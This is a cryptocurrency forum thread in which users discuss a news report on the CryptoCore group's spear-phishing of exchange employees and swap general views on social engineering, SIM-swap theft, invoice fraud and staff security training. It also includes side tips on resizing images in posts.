Seemingly simple hacker tactic yet effective against exchange employees

[Yogee]

I just finished reading https://www.bleepingcomputer.com/news/security/cryptocore-hackers-made-over-200m-breaching-crypto-exchanges/ and I was really frustrated at how hackers can steal millions of dollars using easily preventable hacking tactics.

Exchanges can set up the best security system but when employees or their executives are careless, all system are good as useless. A simple practice of "Do not trust, verify" would have saved them and the users all the trouble.

Here's a summary of the article:

1. CryptoCore hackers would collect exchange executive's personal email and impersonate them.  
2. Sends a phishing email to employees containing a document that is password protected.



3. Opening the password protected file will execute VBS scripts that downloads malicious files. Hackers will use that as a backdoor to gain access to password manager account and then steal keys to crypto wallets.  




P.S.
Can anyone teach me how to resize the image? It's too big.
I read it before but forgot.

[1714926427]

1714926427

[1714926427]

1714926427

[1714926427]

1714926427

[ABCbits]

Human is always weakest part of security. But the interesting part is the hacker is willing to search employee personal email (rather than work email), where people usually don't take precautions or open it from personal PC which contain all important files.

P.S. Use this BBcode to resize your image

Code:

[img width=400]https://www.bleepstatic.com/images/news/security/attacks/c/cryptocore/spear-phishing-attack.jpg[/img]

[DaveF]

Spear Phishing has been getting worse because people are getting cheaper and not investing in proper IT security.
If I am an employee at Yogee Exchange and I get an email from my boss ETFbitcoin there should be 1 of 2 things happening.

1) There is an indication that it came from a local account
2) An indication that it did not and I should be careful.

Either one works, but if you do not have your corporate email server setup to do that then you do not have even a basic IT security policy in place.

IF the hackers managed to get into the mail server to actually authenticate and send as ETFbitcoin then you are already in deep trouble.

-Dave

[mk4]

That's why it's really really important for companies(most especially in the finance industry) in general to make sure about these kinds of exploits. And the problem is, you don't even need to go this deep to potentially get what you want. Remember the sim-swap attacks in the past years? Stealing good amounts of bitcoin on Coinbase? Yea, not even a malware was needed. Only pure social-engineering.

https://medium.com/coinmonks/the-most-expensive-lesson-of-my-life-details-of-sim-port-hack-35de11517124

[Welsh]

Social engineering is by far the most used method, because normally the very weak point of a system is the person that is employed by the company, and doesn't have knowledge in social engineering attempts. Usually, somewhat low qualified, and low wage, where as if they wanted to hack into the system through a sophisticated way they would be likely dealing with Cyber Security experts which are on a lot of money, and therefore put more effort into their work. For example, a lowly paid, and therefore lowly motivated employee with decent access to the backend usually isn't going to be as motivated to protect against these types of attacks.

[Baofeng]

Exchanges and it's employees are going to be a high value target for this scammers and cyber-criminals. That's why it is very important that this people understand how those criminals work and how it can be prevented by educating them on good security hygiene. Attacks came from different directions but I think the one of the best practice is not to click anything on their email, specially unknown sources with URL shortener, emails with attachments. This should be practice not by just mid-tier employees, but it should start from top management as well.

[shield132]

User above me showed you how to resize image via bbcode but I'll offer you another option (takes some time but good for all of us).

1. Upload your image and resize on https://resizeimage.net/
2. Download resized image and then upload on https://tinyjpg.com/
3. Download compressed image and put among tags [ img][/img]

This way images are compress while still maintaining high quality and as a result bitcointalk users load website faster because of compressed images (saves our MBs when we are using mobile data).

Not only employees or their executives are careless but they don't have enough knowledge and don't put enough resources in developing better and higher security standards.

At the same time problem lies in users too. People just blindly open everything, the most curious proof of it is how people share every fake news they see in social medias and they can't decide whether BBC provides more relevant information or 9gag.

[slaman29]

It's the oldest tactic in the phishing book and it continues to work until today. My cousin's company just lost a huge amount of money last week too and guess why? Their boss requested their HR to make a payment to a supplier invoice but he didn't realize the sender was fake. They had been spying on his email for a long time, and found out a huge supplier was supposed to bill them, so they did that, pretended to be the supplier and boom.

[Yogee]

Human is always weakest part of security. But the interesting part is the hacker is willing to search employee personal email (rather than work email), where people usually don't take precautions or open it from personal PC which contain all important files.
......

That personal email part got my attention too and yes it's less likely for employees to be less cautious when opening mails. Maybe they thought it's more private and more secure 

Spear Phishing has been getting worse because people are getting cheaper and not investing in proper IT security.
If I am an employee at Yogee Exchange and I get an email from my boss ETFbitcoin there should be 1 of 2 things happening.

1) There is an indication that it came from a local account
2) An indication that it did not and I should be careful.

Either one works, but if you do not have your corporate email server setup to do that then you do not have even a basic IT security policy in place.

IF the hackers managed to get into the mail server to actually authenticate and send as ETFbitcoin then you are already in deep trouble.

-Dave

It is hard to believe and I personally doubt that crypto echanges wouldn't invest in proper security but that seems to be the case. For sure they have the funds but maybe they're trying to save up for more profits in exchange of user funds 

That's why it's really really important for companies(most especially in the finance industry) in general to make sure about these kinds of exploits. And the problem is, you don't even need to go this deep to potentially get what you want. Remember the sim-swap attacks in the past years? Stealing good amounts of bitcoin on Coinbase? Yea, not even a malware was needed. Only pure social-engineering.

https://medium.com/coinmonks/the-most-expensive-lesson-of-my-life-details-of-sim-port-hack-35de11517124

I agree that employees & executives needs to be educated and it doesn't take a lot to brief them every now and then. Most companies will avert these kinds of attacks if they are well informed and they apply what they were taught.

I heard of the sim port attack before but this is the first time I've read a personal testimony of a victim.

Social engineering is by far the most used method, because normally the very weak point of a system is the person that is employed by the company, and doesn't have knowledge in social engineering attempts. Usually, somewhat low qualified, and low wage, where as if they wanted to hack into the system through a sophisticated way they would be likely dealing with Cyber Security experts which are on a lot of money, and therefore put more effort into their work. For example, a lowly paid, and therefore lowly motivated employee with decent access to the backend usually isn't going to be as motivated to protect against these types of attacks.

Accessing accounts of lower tier employees is probably where it started in all the hacking cases stated in the article. It's also true that the level of security awareness are different. 

Exchanges and it's employees are going to be a high value target for this scammers and cyber-criminals. That's why it is very important that this people understand how those criminals work and how it can be prevented by educating them on good security hygiene. Attacks came from different directions but I think the one of the best practice is not to click anything on their email, specially unknown sources with URL shortener, emails with attachments. This should be practice not by just mid-tier employees, but it should start from top management as well.

Spot on. Unfortunately, most of these guys do not verify first if the file they got is legitimate. It's unlikely they will even question their boss or superior if it really came from them out of fear.

......
Not only employees or their executives are careless but they don't have enough knowledge and don't put enough resources in developing better and higher security standards.

......

More savings and profit over security. Priorities 

It's the oldest tactic in the phishing book and it continues to work until today. My cousin's company just lost a huge amount of money last week too and guess why? Their boss requested their HR to make a payment to a supplier invoice but he didn't realize the sender was fake. They had been spying on his email for a long time, and found out a huge supplier was supposed to bill them, so they did that, pretended to be the supplier and boom.

If the boss himself is unable to verify if the supplier is legit, then the company is in big trouble. This is not the first time I heard of such cases.

It's not related to the topic but is HR the Human Resource? If that's the case, I am curious as to why the owner would ask their HR instead of the company accountant who is likely more knowledgeable and more cautious when it comes to releasing payments.

[NotATether]

They should take corporate classes about phishing that teaches them how to detect a phishing scam and what to do when someone is phishing you. I can't stress the last part enough. All companies should have policies about how to handle phishing attacks including contacting law enforcement and sending legal notices against the phishers and maybe the email hosting provider they are using if it's a sketchy company address that's not being hosted by a mega email company (since they are most likely overrun with phishing email addresses).

[trish22]

Very informative, even so secure sites , if targeted by hackers  it will be hack and only time is the difference on how long the system will be penetrated.

[smyslov]

There is also such a thing as conniving with hackers or inside job, they will just make it complicated and execute a set up hacking via social engineering to make it appear that an employee is not part of the game, we have seen a lot of hacked exchange charged with inside jobs, exchange is one of the lifeline of Cryptocurrency exchange if exchange shows weakness, the market price will take a dip, of course it depends on the reputation of the exchange

[Quidat]

There is also such a thing as conniving with hackers or inside job, they will just make it complicated and execute a set up hacking via social engineering to make it appear that an employee is not part of the game, we have seen a lot of hacked exchange charged with inside jobs, exchange is one of the lifeline of Cryptocurrency exchange if exchange shows weakness, the market price will take a dip, of course it depends on the reputation of the exchange

This is indeed true! Some of these cases are just simply a cover up of an inside job and do took blame for some social engineering victim but actually they are part on said hacking incident.
When it comes to security aspect then we cant deny that human are the weakest part of it.This social engineering kind of way is already been known but people are way too careless
but we cant really deny that hackers are way too patient on finding those personal emails of said employees on said exchange.Dont know on how they do it in the first place on just knowing
that they are part of the company.